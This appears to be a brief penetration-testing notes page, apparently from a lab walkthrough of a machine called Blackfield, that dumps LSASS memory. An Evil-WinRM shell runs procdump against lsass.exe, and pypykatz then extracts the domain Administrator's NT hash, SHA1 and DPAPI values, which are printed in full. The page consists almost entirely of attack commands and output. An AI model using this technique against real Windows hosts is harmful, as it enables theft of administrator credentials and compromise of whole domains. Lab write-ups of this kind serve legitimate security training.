LSASS
Practice
References
Last updated
.\procdump.exe -ma -accepteula lsass.exe lsass.dmp*Evil-WinRM* PS C:\Windows\system32> .\procdump.exe -ma -accepteula lsass.exe lsass.dmp
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[12:39:32] Dump 1 initiated: C:\Windows\system32\lsass.dmp
[12:39:33] Dump 1 writing: Estimated dump file size is 160 MB.
[12:39:33] Dump 1 complete: 160 MB written in 0.8 seconds
[12:39:33] Dump count reached.┌──(root㉿kali)-[~/Pentest/Machine]
└─# pypykatz lsa minidump lsass.dmp
...
== LogonSession ==
authentication_id 576371 (8cb73)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2024-11-07T17:59:12.813343+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 576371
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 184fb5e5178480be64824d4cd53b99ee
SHA1: 7d37f44d9e27fcc75ecb1e7ac9f34f0f18a83f5e
DPAPI: 3fea2a21284fb5cf053ae8be1fab2ead00000000
== WDIGEST [8cb73]==
username Administrator
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL